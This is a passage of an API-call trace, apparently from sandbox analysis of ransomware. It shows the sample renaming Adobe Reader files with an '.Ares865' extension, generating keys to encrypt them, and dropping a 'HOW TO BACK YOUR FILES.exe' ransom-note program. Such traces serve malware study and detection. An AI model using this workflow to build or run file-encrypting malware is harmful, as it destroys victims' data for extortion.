10.0\\Reader\\sqlite.dll.Ares865") returned 66 [0169.267] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\sqlite.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sqlite.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\sqlite.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sqlite.dll.ares865"), dwFlags=0x1) returned 1 [0169.269] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\sqlite.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sqlite.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.269] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=249232) returned 1 [0169.270] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.270] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.270] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.281] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.282] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.282] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.286] lstrcpyW (in: lpString1=0x2cce460, lpString2="Tracker" | out: lpString1="Tracker") returned="Tracker" [0169.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0169.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4878 [0169.286] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0169.286] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x801fc020, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ViewerPS.dll", cAlternateFileName="")) returned 1 [0169.286] lstrcmpiW (lpString1="ViewerPS.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0169.286] lstrcmpiW (lpString1="ViewerPS.dll", lpString2="aoldtz.exe") returned 1 [0169.286] lstrcpyW (in: lpString1=0x2cce460, lpString2="ViewerPS.dll" | out: lpString1="ViewerPS.dll") returned="ViewerPS.dll" [0169.286] lstrlenW (lpString="ViewerPS.dll") returned 12 [0169.286] lstrlenW (lpString="Ares865") returned 7 [0169.286] lstrcmpiW (lpString1="rPS.dll", lpString2="Ares865") returned 1 [0169.286] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ViewerPS.dll.Ares865") returned 68 [0169.287] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ViewerPS.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\viewerps.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ViewerPS.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\viewerps.dll.ares865"), dwFlags=0x1) returned 1 [0169.298] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ViewerPS.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\viewerps.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17304) returned 1 [0169.298] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.299] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.299] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.302] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.303] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.303] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.304] lstrcpyW (in: lpString1=0x2cce460, lpString2="wow_helper.exe" | out: lpString1="wow_helper.exe") returned="wow_helper.exe" [0169.304] lstrlenW (lpString="wow_helper.exe") returned 14 [0169.304] lstrlenW (lpString="Ares865") returned 7 [0169.304] lstrcmpiW (lpString1="per.exe", lpString2="Ares865") returned 1 [0169.304] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe.Ares865") returned 70 [0169.304] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\wow_helper.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\wow_helper.exe.ares865"), dwFlags=0x1) returned 1 [0169.306] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\wow_helper.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.306] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=73624) returned 1 [0169.306] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.312] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.313] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.313] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.314] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker" [0169.315] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker" [0169.315] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0169.315] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\how to back your files.exe"), bFailIfExists=1) returned 0 [0169.316] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0169.316] GetLastError () returned 0x0 [0169.317] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0169.317] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801fc020, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5483cc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5483cc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0169.318] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0169.318] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0169.318] lstrcpyW (in: lpString1=0x2cce470, lpString2="add_reviewer.gif" | out: lpString1="add_reviewer.gif") returned="add_reviewer.gif" [0169.318] lstrlenW (lpString="add_reviewer.gif") returned 16 [0169.318] lstrlenW (lpString="Ares865") returned 7 [0169.318] lstrcmpiW (lpString1="wer.gif", lpString2="Ares865") returned 1 [0169.318] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\add_reviewer.gif.Ares865") returned 80 [0169.318] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\add_reviewer.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\add_reviewer.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\add_reviewer.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\add_reviewer.gif.ares865"), dwFlags=0x1) returned 1 [0169.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\add_reviewer.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\add_reviewer.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.320] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1338) returned 1 [0169.321] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.321] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.321] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.324] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.325] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.325] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.325] lstrcpyW (in: lpString1=0x2cce470, lpString2="bl.gif" | out: lpString1="bl.gif") returned="bl.gif" [0169.325] lstrlenW (lpString="bl.gif") returned 6 [0169.325] lstrlenW (lpString="Ares865") returned 7 [0169.326] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\bl.gif.Ares865") returned 70 [0169.326] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\bl.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\bl.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\bl.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\bl.gif.ares865"), dwFlags=0x1) returned 1 [0169.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\bl.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\bl.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.328] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83) returned 1 [0169.328] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.329] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.329] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.331] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.332] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.332] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.333] lstrcpyW (in: lpString1=0x2cce470, lpString2="br.gif" | out: lpString1="br.gif") returned="br.gif" [0169.333] lstrlenW (lpString="br.gif") returned 6 [0169.333] lstrlenW (lpString="Ares865") returned 7 [0169.333] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\br.gif.Ares865") returned 70 [0169.333] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\br.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\br.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\br.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\br.gif.ares865"), dwFlags=0x1) returned 1 [0169.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\br.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\br.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.335] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=82) returned 1 [0169.335] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.336] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.336] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.338] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.339] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.339] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.340] lstrcpyW (in: lpString1=0x2cce470, lpString2="create_form.gif" | out: lpString1="create_form.gif") returned="create_form.gif" [0169.340] lstrlenW (lpString="create_form.gif") returned 15 [0169.340] lstrlenW (lpString="Ares865") returned 7 [0169.340] lstrcmpiW (lpString1="orm.gif", lpString2="Ares865") returned 1 [0169.340] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\create_form.gif.Ares865") returned 79 [0169.340] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\create_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\create_form.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\create_form.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\create_form.gif.ares865"), dwFlags=0x1) returned 1 [0169.342] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\create_form.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\create_form.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.342] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1194) returned 1 [0169.342] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.343] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.343] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.345] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.346] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.346] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.346] lstrcpyW (in: lpString1=0x2cce470, lpString2="distribute_form.gif" | out: lpString1="distribute_form.gif") returned="distribute_form.gif" [0169.347] lstrlenW (lpString="distribute_form.gif") returned 19 [0169.347] lstrlenW (lpString="Ares865") returned 7 [0169.347] lstrcmpiW (lpString1="orm.gif", lpString2="Ares865") returned 1 [0169.347] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\distribute_form.gif.Ares865") returned 83 [0169.347] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\distribute_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\distribute_form.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\distribute_form.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\distribute_form.gif.ares865"), dwFlags=0x1) returned 1 [0169.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\distribute_form.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\distribute_form.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.349] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=821) returned 1 [0169.349] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.350] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.350] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.352] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.353] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.353] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.354] lstrcpyW (in: lpString1=0x2cce470, lpString2="email_all.gif" | out: lpString1="email_all.gif") returned="email_all.gif" [0169.354] lstrlenW (lpString="email_all.gif") returned 13 [0169.354] lstrlenW (lpString="Ares865") returned 7 [0169.354] lstrcmpiW (lpString1="all.gif", lpString2="Ares865") returned -1 [0169.354] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_all.gif.Ares865") returned 77 [0169.354] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_all.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_all.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_all.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_all.gif.ares865"), dwFlags=0x1) returned 1 [0169.356] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_all.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_all.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.356] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1443) returned 1 [0169.356] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.357] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.357] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.359] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.360] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.360] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.360] lstrcpyW (in: lpString1=0x2cce470, lpString2="email_initiator.gif" | out: lpString1="email_initiator.gif") returned="email_initiator.gif" [0169.360] lstrlenW (lpString="email_initiator.gif") returned 19 [0169.360] lstrlenW (lpString="Ares865") returned 7 [0169.360] lstrcmpiW (lpString1="tor.gif", lpString2="Ares865") returned 1 [0169.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_initiator.gif.Ares865") returned 83 [0169.361] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_initiator.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_initiator.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_initiator.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_initiator.gif.ares865"), dwFlags=0x1) returned 1 [0169.362] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_initiator.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_initiator.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.362] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1360) returned 1 [0169.363] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.363] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.363] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.367] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.368] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.368] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.368] lstrcpyW (in: lpString1=0x2cce470, lpString2="ended_review_or_form.gif" | out: lpString1="ended_review_or_form.gif") returned="ended_review_or_form.gif" [0169.369] lstrlenW (lpString="ended_review_or_form.gif") returned 24 [0169.369] lstrlenW (lpString="Ares865") returned 7 [0169.369] lstrcmpiW (lpString1="orm.gif", lpString2="Ares865") returned 1 [0169.369] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\ended_review_or_form.gif.Ares865") returned 88 [0169.369] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\ended_review_or_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\ended_review_or_form.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\ended_review_or_form.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\ended_review_or_form.gif.ares865"), dwFlags=0x1) returned 1 [0169.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\ended_review_or_form.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\ended_review_or_form.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.375] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=807) returned 1 [0169.375] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.376] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.376] CryptReleaseContext 